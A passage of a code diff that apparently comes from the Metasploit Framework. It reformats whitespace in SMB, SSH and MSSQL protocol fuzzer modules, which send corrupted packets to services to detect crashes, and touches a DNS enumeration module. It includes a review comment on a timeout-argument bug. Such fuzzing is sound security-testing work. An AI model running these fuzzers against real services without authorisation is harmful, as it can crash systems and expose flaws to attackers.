if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
-
+
begin
r = do_smb_negotiate(str, 0.25)
rescue ::Interrupt
@@ -72,21 +72,21 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
last_str = str
last_inp = @last_fuzzer_input
end
end
-
+
def make_smb_negotiate
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
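Review bot: `r = do_smb_negotiate(str, 0.25)` passes a Float where `do_smb_negotiate(pkt,opts={})` expects a hash, so `opts[:timeout]` in the helper evaluates `0.25[:timeout]` and raises NoMethodError on every iteration — after `sock.put(pkt)` has already sent the packet, so the response is never read and the raise is presumably absorbed by a rescue arm outside this hunk and recorded in `last_err`. The call should read `r = do_smb_negotiate(str, :timeout => 0.25)`; `r` is also never used afterwards. The same mismatch is on the new side of smb_create_pipe_corrupt.rb (`do_smb_login(str, 0.25)` against `opts[:timeout]`), smb_negotiate_corrupt.rb and smb_ntlm1_login_corrupt.rb; smb_create_pipe.rb passes `0.25` to `do_smb_create` as well, but that helper's visible body does not read `opts`.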
18 modules/auxiliary/fuzzers/smb/smb_create_pipe.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Create Pipe Request Fuzzer',
@@ -29,7 +29,7 @@ def initialize(info = {})
'Version' => '$Revision$'
))
end
-
+
def do_smb_create(pkt,opts={})
@connected = false
connect
@@ -37,21 +37,21 @@ def do_smb_create(pkt,opts={})
@connected = true
smb_create("\\" + pkt)
end
-
+
def run
last_str = nil
last_inp = nil
last_err = nil
-
+
cnt = 0
fuzz_strings do |str|
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
end
-
+
begin
do_smb_create(str, 0.25)
rescue ::Interrupt
@@ -62,16 +62,16 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
last_str = str
last_inp = @last_fuzzer_input
end
38 modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Fuzzer
-
+
def initialize(info = {})
super(update_info(info,
'Name' => 'SMB Create Pipe Request Corruption',
@@ -32,43 +32,43 @@ def initialize(info = {})
OptString.new('SMBPIPE', [true, 'Specify the pipe name to corrupt', "\\BROWSER"])
], self.class)
end
-
+
def do_smb_login(pkt,opts={})
@connected = false
connect
smb_login
-
+
@connected = true
sock.put(pkt)
sock.get_once(-1, opts[:timeout])
end
-
+
def run
-
+
# Connect in order to get the server-assigned user-id/tree-id
connect
smb_login
pkt = make_smb_create
disconnect
-
+
last_str = nil
last_inp = nil
last_err = nil
-
+
cnt = 0
-
+
max = datastore['MAXDEPTH'].to_i
max = nil if max == 0
tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
print_status("Fuzzing SMB create pipe with #{tot} requests")
fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
cnt += 1
-
+
if(cnt % 100 == 0)
print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
end
-
+
begin
r = do_smb_login(str, 0.25)
rescue ::Interrupt
@@ -79,42 +79,42 @@ def run
ensure
disconnect
end
-
+
if(not @connected)
if(last_str)
print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
else
- print_status("Could not connect to the service: #{last_err}")
+ print_status("Could not connect to the service: #{last_err}")
end
return
end
-
+
last_str = str
last_inp = @last_fuzzer_input
end
end
-
+
def make_smb_create
filename = datastore['SMBPIPE']
disposition = 1
impersonation = 2
-
+
pkt = Rex::Proto::SMB::Constants::SMB_CREATE_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
-
+
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NT_CREATE_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 24
-
+
pkt['Payload'].v['AndX'] = 255
pkt['Payload'].v['FileNameLen'] = filename.length
pkt['Payload'].v['CreateFlags'] = 0x16
pkt['Payload'].v['AccessMask'] = 0x02000000 # Maximum Allowed
pkt['Payload'].v['ShareAccess'] = 7
pkt['Payload'].v['CreateOptions'] = 0
- pkt['Payload'].v['Impersonation'] = impersonation
+ pkt['Payload'].v['Impersonation'] = impersonation
pkt['Payload'].v['Disposition'] = disposition
pkt['Payload'].v['Payload'] = filename + "\x00"
pkt.to_s
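--- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb
+++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SMB Negotiate Dialect Corruption',
@@ -32,7 +32,7 @@ def initialize(info = {})
 OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
 ], self.class)
 end
-
+
 def do_smb_negotiate(pkt,opts={})
 @connected = false
 connect
@@ -40,27 +40,27 @@ def do_smb_negotiate(pkt,opts={})
 sock.put(pkt)
 sock.get_once(-1, opts[:timeout])
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 pkt = make_smb_negotiate
 cnt = 0
-
+
 max = datastore['MAXDEPTH'].to_i
 max = nil if max == 0
 tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
 print_status("Fuzzing SMB negotiate packet with #{tot} requests")
 fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_smb_negotiate(str, 0.25)
 rescue ::Interrupt
@@ -71,21 +71,21 @@ def run
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
-print_status("Could not connect to the service: #{last_err}")
+print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 last_str = str
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_smb_negotiate
 # The SMB 2 dialect must be there
 dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12']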
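--- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
+++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::SMB
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SMB NTLMv1 Login Request Corruption',
@@ -33,37 +33,37 @@ def initialize(info = {})
 OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
 ], self.class)
 end
-
+
 def do_smb_login(pkt,opts={})
 @connected = false
 connect
 simple.client.negotiate(false)
-
+
 @connected = true
 sock.put(pkt)
 sock.get_once(-1, opts[:timeout])
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 pkt = make_smb_login
 cnt = 0
-
+
 max = datastore['MAXDEPTH'].to_i
 max = nil if max == 0
 tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
 print_status("Fuzzing SMB login with #{tot} requests")
 fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_smb_login(str, 0.25)
 rescue ::Interrupt
@@ -74,23 +74,23 @@ def run
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
-print_status("Could not connect to the service: #{last_err}")
+print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 last_str = str
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_smb_login
-
+
 user = "USER"
 domain = "DOMAIN"
 hash_lm = Rex::Proto::SMB::Crypt.lanman_des("X", "X" * 8)
@@ -102,10 +102,10 @@ def make_smb_login
 data << user + "\x00"
 data << domain + "\x00"
 data << 'Windows 2000 2195' + "\x00"
-data << 'Windows 2000 5.0' + "\x00"
-
+data << 'Windows 2000 5.0' + "\x00"
+
 pkt = Rex::Proto::SMB::Constants::SMB_SETUP_NTLMV1_PKT.make_struct
-
+
 pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_SESSION_SETUP_ANDX
 pkt['Payload']['SMB'].v['Flags1'] = 0x18
 pkt['Payload']['SMB'].v['Flags2'] = 0x2001
@@ -113,7 +113,7 @@ def make_smb_login
 pkt['Payload'].v['AndX'] = 255
 pkt['Payload'].v['MaxBuff'] = 0xffdf
 pkt['Payload'].v['MaxMPX'] = 2
-pkt['Payload'].v['VCNum'] = 1
+pkt['Payload'].v['VCNum'] = 1
 pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
 pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
 pkt['Payload'].v['Capabilities'] = 64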
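--- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb
+++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SSH 1.5 Version Fuzzer',
@@ -31,34 +31,34 @@ def initialize(info = {})
 Opt::RPORT(22)
 ], self.class)
 end
-
+
 def do_ssh_version(pkt,opts={})
 @connected = false
 connect
 @connected = true
-
+
 @banner = sock.get_once(-1,opts[:banner_timeout])
 return if not @banner
 sock.put("#{pkt}\r\n")
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 ver = make_ssh_version_base
 cnt = 0
-
+
 fuzz_strings do |str|
 cnt += 1
-
+
 pkt = ver + str
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_ssh_version(str,:banner_timeout => 5)
 rescue ::Interrupt
@@ -69,16 +69,16 @@ def run
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
-print_status("Could not connect to the service: #{last_err}")
+print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 if(not @banner)
 print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
 return
@@ -88,7 +88,7 @@ def run
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_ssh_version_base
 "SSH-1.5-"
 end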
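--- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
+++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SSH 2.0 Version Fuzzer',
@@ -31,34 +31,34 @@ def initialize(info = {})
 Opt::RPORT(22)
 ], self.class)
 end
-
+
 def do_ssh_version(pkt,opts={})
 @connected = false
 connect
 @connected = true
-
+
 @banner = sock.get_once(-1,opts[:banner_timeout])
 return if not @banner
 sock.put("#{pkt}\r\n")
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 ver = make_ssh_version_base
 cnt = 0
-
+
 fuzz_strings do |str|
 cnt += 1
-
+
 pkt = ver + str
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_ssh_version(str,:banner_timeout => 5)
 rescue ::Interrupt
@@ -69,16 +69,16 @@ def run
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
-print_status("Could not connect to the service: #{last_err}")
+print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 if(not @banner)
 print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
 return
@@ -88,7 +88,7 @@ def run
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_ssh_version_base
 "SSH-2.0-"
 end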
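--- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb
+++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::Tcp
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'SSH Version Corruption',
@@ -32,37 +32,37 @@ def initialize(info = {})
 OptInt.new('MAXDEPTH', [false, 'Specify a maximum byte depth to test'])
 ], self.class)
 end
-
+
 def do_ssh_version(pkt,opts={})
 @connected = false
 connect
 @connected = true
-
+
 @banner = sock.get_once(-1,opts[:banner_timeout])
 return if not @banner
 sock.put("#{pkt}\r\n")
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 pkt = make_ssh_version
 cnt = 0
-
+
 max = datastore['MAXDEPTH'].to_i
 max = nil if max == 0
 tot = ( max ? [max,pkt.length].min : pkt.length) * 256
-
+
 print_status("Fuzzing SSH version string with #{tot} requests")
 fuzz_string_corrupt_byte_reverse(pkt,max) do |str|
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt}/#{tot} using #{@last_fuzzer_input}")
 end
-
+
 begin
 r = do_ssh_version(str,:banner_timeout => 5)
 rescue ::Interrupt
@@ -73,16 +73,16 @@ def run
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
-print_status("Could not connect to the service: #{last_err}")
+print_status("Could not connect to the service: #{last_err}")
 end
 return
 end
-
+
 if(not @banner)
 print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
 return
@@ -92,7 +92,7 @@ def run
 last_inp = @last_fuzzer_input
 end
 end
-
+
 def make_ssh_version
 "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1"
 end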
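--- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb
+++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::MSSQL
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'TDS Protocol Login Request Corruption Fuzzer',
@@ -31,11 +31,11 @@ def initialize(info = {})
 # A copy of the mssql_login method with the ability to overload each option
 def make_login(opts={})
-
+
 pkt = ""
 idx = 0
 db = ""
-
+
 pkt << [
 0x00000000, # Dummy size
 opts[:tds_version] || 0x71000001, # TDS Version
@@ -50,42 +50,42 @@ def make_login(opts={})
 opts[:timezone] || 0x00000000, # Time Zone
 opts[:collation] || 0x00000000 # Collation
 ].pack('VVVVVVCCCCVV')
-
-
+
+
 cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
 uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
 pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
-aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
+aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
 sname = Rex::Text.to_unicode( opts[:sname] || rhost )
 dname = Rex::Text.to_unicode( opts[:dname] || db )
-
+
 idx = pkt.size + 50 # lengths below
-
+
 pkt << [idx, cname.length / 2].pack('vv')
 idx += cname.length
-
+
 pkt << [idx, uname.length / 2].pack('vv')
-idx += uname.length
-
+idx += uname.length
+
 pkt << [idx, pname.length / 2].pack('vv')
 idx += pname.length
 pkt << [idx, aname.length / 2].pack('vv')
-idx += aname.length
-
+idx += aname.length
+
 pkt << [idx, sname.length / 2].pack('vv')
 idx += sname.length
-
+
 pkt << [0, 0].pack('vv')
-
+
 pkt << [idx, aname.length / 2].pack('vv')
-idx += aname.length
+idx += aname.length
 pkt << [idx, 0].pack('vv')
-
+
 pkt << [idx, dname.length / 2].pack('vv')
-idx += dname.length
-
+idx += dname.length
+
 # The total length has to be embedded twice more here
 pkt << [
 0,
@@ -93,15 +93,15 @@ def make_login(opts={})
 0x12345678,
 0x12345678
 ].pack('vVVV')
-
+
 pkt << cname
 pkt << uname
 pkt << pname
-pkt << aname
+pkt << aname
 pkt << sname
 pkt << aname
 pkt << dname
-
+
 # Total packet length
 pkt[0,4] = [pkt.length].pack('V')
@@ -113,34 +113,34 @@ def make_login(opts={})
 pkt
 end
-
+
 def do_login(pkt,opts={})
 @connected = false
 disconnect if self.sock
 connect
 @connected = true
-
+
 resp = mssql_send_recv(pkt,opts[:timeout])
-
+
 info = {:errors => []}
 info = mssql_parse_reply(resp,info)
 info
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 pkt = make_login
 cnt = 0
 fuzz_string_corrupt_byte_reverse(pkt) do |str|
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
 end
-
+
 begin
 do_login(str,:timeout => 0.50)
 rescue ::Interrupt
@@ -151,12 +151,12 @@ def run
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
-print_status("Could not connect to the service: #{last_err}")
+print_status("Could not connect to the service: #{last_err}")
 end
 return
 end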
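--- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb
+++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
 include Msf::Exploit::Remote::MSSQL
 include Msf::Auxiliary::Fuzzer
-
+
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'TDS Protocol Login Request Username Fuzzer',
@@ -31,16 +31,16 @@ def initialize(info = {})
 # A copy of the mssql_login method with the ability to overload each option
 def do_login(opts={})
-
+
 @connected = false
 disconnect if self.sock
 connect
 @connected = true
-
+
 pkt = ""
 idx = 0
 db = ""
-
+
 pkt << [
 0x00000000, # Dummy size
 opts[:tds_version] || 0x71000001, # TDS Version
@@ -55,42 +55,42 @@ def do_login(opts={})
 opts[:timezone] || 0x00000000, # Time Zone
 opts[:collation] || 0x00000000 # Collation
 ].pack('VVVVVVCCCCVV')
-
-
+
+
 cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )
 uname = Rex::Text.to_unicode( opts[:uname] || "sa" )
 pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )
-aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
+aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )
 sname = Rex::Text.to_unicode( opts[:sname] || rhost )
 dname = Rex::Text.to_unicode( opts[:dname] || db )
-
+
 idx = pkt.size + 50 # lengths below
-
+
 pkt << [idx, cname.length / 2].pack('vv')
 idx += cname.length
-
+
 pkt << [idx, uname.length / 2].pack('vv')
-idx += uname.length
-
+idx += uname.length
+
 pkt << [idx, pname.length / 2].pack('vv')
 idx += pname.length
 pkt << [idx, aname.length / 2].pack('vv')
-idx += aname.length
-
+idx += aname.length
+
 pkt << [idx, sname.length / 2].pack('vv')
 idx += sname.length
-
+
 pkt << [0, 0].pack('vv')
-
+
 pkt << [idx, aname.length / 2].pack('vv')
-idx += aname.length
+idx += aname.length
 pkt << [idx, 0].pack('vv')
-
+
 pkt << [idx, dname.length / 2].pack('vv')
-idx += dname.length
-
+idx += dname.length
+
 # The total length has to be embedded twice more here
 pkt << [
 0,
@@ -98,15 +98,15 @@ def do_login(opts={})
 0x12345678,
 0x12345678
 ].pack('vVVV')
-
+
 pkt << cname
 pkt << uname
 pkt << pname
-pkt << aname
+pkt << aname
 pkt << sname
 pkt << aname
 pkt << dname
-
+
 # Total packet length
 pkt[0,4] = [pkt.length].pack('V')
@@ -117,27 +117,27 @@ def do_login(opts={})
 pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
 resp = mssql_send_recv(pkt,opts[:timeout])
-
+
 info = {:errors => []}
 info = mssql_parse_reply(resp,info)
 info
 end
-
+
 def run
 last_str = nil
 last_inp = nil
 last_err = nil
-
+
 cnt = 0
 fuzz_strings do |str|
 # capped at 16-bit lengths
 next if str.length > 65535
 cnt += 1
-
+
 if(cnt % 100 == 0)
 print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
 end
-
+
 begin
 do_login(:uname => str, :timeout => 0.50)
 rescue ::Interrupt
@@ -148,12 +148,12 @@ def run
 ensure
 disconnect
 end
-
+
 if(not @connected)
 if(last_str)
 print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
 else
-print_status("Could not connect to the service: #{last_err}")
+print_status("Could not connect to the service: #{last_err}")
 end
 return
 end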
35 modules/auxiliary/gather/dns_enum.rb
@@ -1,32 +1,36 @@
##
+# $Id$
+##
+
+##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
-
require 'msf/core'
-
require "net/dns/resolver"
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
+
def initialize(info = {})
super(update_info(info,
- 'Name' => 'DNS Enumeration Module',
- 'Description' => %q{
+ 'Name' => 'DNS Enumeration Module',
+ 'Description' => %q{
This module can be used to enumerate various types of information
about a domain from a specific DNS server.
- },
- 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision$',
- 'References' =>
- [
- ['CVE', '1999-0532'],
- ]
- ))
+ },
+ 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ ['CVE', '1999-0532'],
+ ]
+ ))
+
register_options(
[
OptString.new('DOMAIN', [ true, "The target domain name"]),
@@ -42,6 +46,7 @@ def initialize(info = {})
OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]),
OptBool.new('STOP_WLDCRD', [ true, 'Stops Brute Force Enumeration if wildcard resolution is detected', false])
], self.class)
+
register_advanced_options(
[
OptInt.new(